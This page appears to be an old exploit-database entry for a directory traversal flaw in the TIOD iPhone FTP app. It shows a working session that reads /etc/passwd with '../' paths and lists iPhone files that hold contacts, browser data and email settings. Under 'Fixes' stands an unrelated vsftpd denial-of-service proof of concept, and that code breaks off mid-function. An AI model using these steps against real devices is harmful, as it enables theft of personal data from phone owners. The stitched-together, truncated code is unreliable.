TIOD v1.3.3 for iPhone / iPod touch Directory Traversal

2011-03-03 09:15:11

# Exploit Title: TIOD v1.3.3 for iPhone / iPod touch, Directory Traversal
# Date: 03/03/2011
# Author: R3d@l3rt, H@ckk3y
# E-Mail : R3dal3rt.team [at] gmail [dot] com
# Twitter : http://twitter.com/R3dAl3rtTeam
# Software Link: http://itunes.apple.com/kr/app/idocmanager/id404412400?mt=8
# Version: 1.3.3
# Tested on: iPhone, iPod 3GS with 4.2.1 firmware

# There is directory traversal vulnerability in the TIOD.
# Exploit Testing


C:\>ftp
ftp> open 192.168.0.70
Connected to 192.168.0.70.
220 Service ready for new user.
User (192.168.0.70:(none)): anonymous
331 Send e-mail address as password.
Password:
230 User logged in, proceed.
ftp> dir
200 Command okay.
150 About to send file list.
total 0
drwxr-xr-x 2 501 501 68 Feb 14 12:39 CAMERAROLL
226 Transfer complete.
ftp: 76 bytes received in 0.01Seconds 5.07Kbytes/sec.
ftp> dir ../../../../../../etc/passwd
200 Command okay.
150 About to send file list.
total 0
-rw-r--r-- 1 0 0 785 Jan 11 20:14 ../../../../../../etc/pas
swd
226 Transfer complete.
ftp: 94 bytes received in 0.00Seconds 94000.00Kbytes/sec.
ftp> get ../../../../../../etc/passwd
200 Command okay.
150 About to open data connection.


C:\>type passwd
#
# 4.3BSD-compatable User Database
#
# Note that this file is not consulted for login.
# It only exisits for compatability with 4.3BSD utilities.
#
# This file is automatically re-written by various system utilities.
# Do not edit this file. Changes will be lost.
#
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
mobile:*:501:501:Mobile User:/var/mobile:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
_wireless:*:25:25:Wireless Services:/var/wireless:/usr/bin/false
_securityd:*:64:64:securityd:/var/empty:/usr/bin/false
_mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false
_sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false
_unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false

C:\>


# IPhone inside information

1. Phone Book
- /private/var/mobile/Library/AddressBook/AddressBook.sqlitedb

2. Safari Favorites List
- /private/var/mobile/Library/Safari

3. Users E-mail Information
- /private/var/mobile/Library/Preferences/com.apple.accountsettings.plist

4. IPv4 Router Information
- /private/var/mobile/Library/Preferences/com.apple.conference.plist

Fixes

#include
#include
#include
#include
#include
#include
#include

/*
This is code of
http://cxib.net/stuff/vspoc232.c

PoC CVE-2011-0762 ( vsftpd )
Remote Denial of Service

Affected: 2.3.2
Fix: 2.3.4

Author:
Maksymilian Arciemowicz

Use:
./vspoc232 127.0.0.1 21 user pass 1

or read
http://securityreason.com/achievement_securityalert/95
for more information

Example result:
cx@cx64:~$ telnet 172.5.0.129 21
Trying 172.5.0.129...
Connected to 172.5.0.129.
Escape character is '^]'.
500 OOPS: fork
Connection closed by foreign host.

*/

int skip=0;

int sendftp(int stream,char *what){
if(-1==send(stream,what,strlen(what),0))
printf("Can't send %s\n",what);
else
printf("send: %s\n",what);

bzero(what,sizeof(what));
}

void readftp(int stream){
char readline[4096];
if(recv(stream,readline,4096,0)
OVER HACKER 03.03.2011


In order to submit a new fix you need to be registered.